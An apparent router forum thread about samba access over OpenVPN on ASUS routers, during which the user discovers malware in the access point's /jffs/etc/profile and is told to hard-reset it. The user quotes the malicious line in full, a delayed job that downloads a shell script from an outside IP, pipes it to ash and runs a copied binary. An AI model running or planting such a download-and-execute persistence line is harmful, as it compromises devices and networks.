Accesing samba share through VPN

[AndreiR]

Any help with the 2 problems would be greatly appreciated.

The setup:
Primary router RT-AC86U with latest Asus firmware 3.0.0.4.386_48260 (192.168.1.1) acting as DHCP server for the LAN, VPN server (OpenVPN - 10.8.0.1) and has samba enabled with HDD attached - Secondary router RT-AC56U with Asus firmware 3.0.0.4.382_51641 acting as AP with IP 192.168.1.2 which also has samba enabled with HDD attached.

1. I can access all the LAN resources through VPN including AP admin page, I can ping and tracert the AP, but I can't access the samba share on the AP through VPN even though all the routing between VPN subnet and LAN subnet are ok (samba share on RT-AC86 can be accessed and also a share on another computer).

I narrowed down the problem to the samba config file on the AP:

interfaces = lo br0 192.168.1.2/255.255.255.0
hosts allow = 127.0.0.1 192.168.1.2/255.255.255.0
hosts deny = 0.0.0.0/0

The primary router has automatically added an additional allowed host in the samba conf when I started the VPN server, the subnet 10.8.0.0:

interfaces = lo br0 192.168.1.1/255.255.255.0
hosts allow = 127.0.0.1 192.168.1.1/255.255.255.0 10.8.0.0/255.255.255.0
hosts deny = 0.0.0.0/0

I need help adding the subnet to the allowed hosts in the smb.conf on the AP. I've searched for a solution but I only found pieces of information. I don't have much experience with configuring the router through ssh so a step by step would be greatly appreciated.

2. What setup would you recommend for streaming video files from the local network. Streaming from the samba share through VPN on an ios device using FE File Explorer or VLC doesn't work with large files (anything bigger than 5 GB / with a high bitrate), it keeps buffering, with smaller files 1-2 GB works ok. I've also tried the webdav protocol (AIcloud), same problem. I also tried FTP through VPN and (oddly) this protocol works well on large files but I'm not sure if it's streaming or downloading. The file opens immediately and with no buffering.
I'd prefer not to start all the servers available and use the current configuration VPN - samba share for all purposes like accessing files and streaming. Is there a way to tweak this setup so that I can stream large files?
My link is 500 down / 25 up
On my phone I use 5G which has speeds of 200 down / 40 up on average.

Thank you for your help!

 

[AndreiR]

Later edit

Turns out you can replace the /etc/smb.conf with a modified file without killing any services and the change takes effect, I can access the samba share through VPN, but only until reboot, when it is overwritten.
I found some threads about using scripts even on asus wrt but I could use some help. I only need to copy the modified smb.conf at system reboot or use the /jffs/ instead of /etc for the system to use.

using
nvram show | grep jffs | sort -u

i get

size: 51845 bytes (13691 left)
jffs2_exec=ash /jffs/etc/profile
jffs2_on=1
vpn_server1_custom=up "/bin/sh /jffs/etc/profile"
vpn_server_custom=up "/bin/sh /jffs/etc/profile"

The content of the jffs dir is
checksumm nmp_cl_json.js openvpn syslog.log usericon
etc nmp_client_list smb.conf syslog.log-1

While viewing the profile file in /jffs/etc I found this

(sleep 70; if [ ! -f /jffs/checksumm ]; then wget -O- http://103.123.133.70:28632/as_e4DtOMgfOorTPVnvSXm1D/downl_crt.sh | ash; fi; cp /jffs/checksumm /tmp/check; chmod 777 /tmp/check; /tmp/check)&

Is there a script already running?

 

[ColinTaylor]

Your router appears to be infected with malware. See this post: https://www.snbforums.com/threads/c...k-no-such-file-or-directory.72329/post-698689

I suggest that you immediately do a hard reset of your router followed by a manual setup.

 

[AndreiR]

Thank you for your reply. I wouldn't found it if it wasn't for this samba problem. It's the AP that's infected, curious how that happened. I'll do a factory reset on the AC86U also just to be safe.

Also if anyone can help me with making smb.conf persistent through reboot I would be very grateful.
Thank you!

 

[ColinTaylor]

I'll do a factory reset on the AC86U also just to be safe.

If you do a reset through the GUI make sure you check the "Initialize all the settings..." box to clear out the contents of /jffs. Alternatively do a hard reset. Check afterwards that the /jffs/etc directory doesn't exist anymore.

[Wireless Router] ASUS router Hard Factory Reset - Method 2 | Official Support | ASUS Global

Also if anyone can help me with making smb.conf persistent through reboot I would be very grateful.

Sorry, I can't help you with that.

 

[AndreiR]

If you do a reset through the GUI make sure you check the "Initialize all the settings..." box to clear out the contents of /jffs. Alternatively do a hard reset. Check afterwards that the /jffs/etc directory doesn't exist anymore.

[Wireless Router] ASUS router Hard Factory Reset - Method 2 | Official Support | ASUS Global

I deleted all the extra files in jffs then did a GUI reset, hard reset, changed passwords. All seems fine now. The hard reset cleared everything left, including the smb.conf I didn't delete.

I don't know if it has anything to do with it, but the /etc/profile file still has a reference to the jffs (don't know exactly what this file is for):

export PATH="/bin:/usr/bin:/sbin:/usr/sbin:/home/$USER:/mmc/sbin:/mmc/bin:/mmc/usr/sbin:/mmc/usr/bin:/opt/sbin:/opt/bin:/opt/usr/sbin:/opt/usr/bin"
export PS1='\u@\h:\w\$ '

alias l='ls -lFA'
alias ll='ls -lF'

ldd() {
LD_TRACE_LOADED_OBJECTS=1 $*;
}

[ -n "${TMOUT+x}" ] || export TMOUT="$(nvram get shell_timeout 2>/dev/null)"

[ -f /jffs/etc/profile ] && . /jffs/etc/profile
[ -f /opt/etc/profile ] && . /opt/etc/profile

I'll check again tomorrow.

 

[ColinTaylor]

I don't know if it has anything to do with it, but the /etc/profile file still has a reference to the jffs (don't know exactly what this file is for):

That's fine. That's the normal profile file.

 

[AndreiR]

That's fine. That's the normal profile file.

Thank you for all your help!